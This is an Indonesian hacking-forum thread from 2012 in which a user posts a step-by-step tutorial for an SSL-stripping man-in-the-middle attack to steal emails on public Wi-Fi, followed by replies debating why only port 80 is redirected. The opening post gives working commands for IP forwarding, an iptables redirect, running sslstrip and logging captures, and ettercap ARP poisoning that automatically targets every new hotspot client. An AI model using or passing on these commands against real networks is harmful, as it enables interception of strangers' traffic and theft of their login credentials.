Share Man in the middle attack untuk memecah enkripsi SSL - Printable Version +- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum) +-- Forum: Defensive Zone (https://www.indonesianbacktrack.or.id/forum/forum-173.html) +--- Forum: Kriptografi (https://www.indonesianbacktrack.or.id/forum/forum-248.html) +--- Thread: Share Man in the middle attack untuk memecah enkripsi SSL (/thread-3551.html) |
Man in the middle attack untuk memecah enkripsi SSL - dvil - 08-24-2012 Di sini dalam tutorial ini saya akan menjelaskan bagaimana untuk memecahkan enkripsi SSL tanpa melanggar enkripsi SSL menggunakan Man in the middle Attack untuk mencuri email dalam satu jaringan 1.Buka terminal lalu ketikkan perintah echo 1 > /proc/sys/net/ipv4/ip_forward 2.ketikkan perintah selanjutnya iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 54321 3.ketikkan perintah berikutnya cd /pentest/web/sslstrip 4.ketikkan perintah berikutnya python sslstrip.py -p -l 54321 Lalu kita akan membuat log untuk menyimpan email buka terminal baru lalu ketikkan perintah seperti dibawah ini cd /pentest/web/sslstrip tail -f sslstrip.log Buka terminal baru lagi lalu ketikkan perintah seperti di bawah ini ettercap -T -M arp // // -i wlan1 -l dumpfile -q -P autoadd ket = wlan1 adalah interface yang saya gunakan sesuaikan interface kalian Fungsi ettercap autoadd adalah apabila ada client yang baru konek hotspot maka otomatis akan di racuni IP client tersebut Hasil di terminal LOG Hasil di terminal ETTERCAP Bahaya sekali bukan main internet di tempat hotspot gratisan @junior edited this thread, judulnya di edit dikit ya,,agak riskan bahasanya kalau mencuri email RE: Share Man in the middle attack untuk memecah enkripsi SSL - Junior Riau - 08-24-2012 mirip kerja sniffing dengan script yang pernah dishare disini ,, sip sip, keep share bro, bahaya eeuyy mainannya +1 cek freeezer RE: Share Man in the middle attack untuk memecah enkripsi SSL - alkaaf - 08-24-2012 aq msh bingung maen ma sslstrip, katanya jaring ssl tp kok yg di redirect cuman port 80 yak? Pdhl ssl kan jlannya di 443? RE: Share Man in the middle attack untuk memecah enkripsi SSL - Junior Riau - 08-24-2012 port 443 si lapi om,,tujuan si lapi kan port 80 si web, makanya yang tujuannya port 80 di redirect,,ditu om cmiiw ya RE: Share Man in the middle attack untuk memecah enkripsi SSL - wine trochanter - 08-24-2012 oke ane berhasil n bisa, mantab k2 RE: Share Man in the middle attack untuk memecah enkripsi SSL - zee eichel - 08-24-2012 sslstrip kan memecahkan enskripsi ssl bukan meredirect port .. perhatikan pada ettercap dia juga punya lho RE: Share Man in the middle attack untuk memecah enkripsi SSL - alkaaf - 08-24-2012 msh g ngrti. Hehe :d gni mksdnya, kan http tu jalan di port 80, https/ssl jalan di 443. Nah yg dijadiin prtnyaan nuh kok cuman port 80/http aja yg dilewatin sslstrip/por 10000. Nanti dptnya cuman http aja donk, yg https ttp lolos ngga kejaring sslstrip soalnya ngga ada rule redirect 443 ke port sslstrip brow. RE: Share Man in the middle attack untuk memecah enkripsi SSL - iKONspirasi - 08-25-2012 (08-24-2012, 08:41 PM)alkaaf Wrote: msh g ngrti. Hehe :d bener juga kata om alkaaf nih, tapi setau ane klo kita akses https atau port 443 itu sebenernya redirecting dari 80 atau http cmiiw RE: Share Man in the middle attack untuk memecah enkripsi SSL - alkaaf - 08-25-2012 kayanya https bukan redirect dr http bro. Soalnya https ma http tu jalurnya beda bro, https bs brdiri sndiri tnpa http. Coba om instal webmin, (tuh smacam webapp buat administrasi linux). Itu cm jalan di https brow, kl dibuka lwt http kaga bs. RE: Share Man in the middle attack untuk memecah enkripsi SSL - Junior Riau - 08-25-2012 pusing daah bingung dengan pemahaman masing2 :tkp: |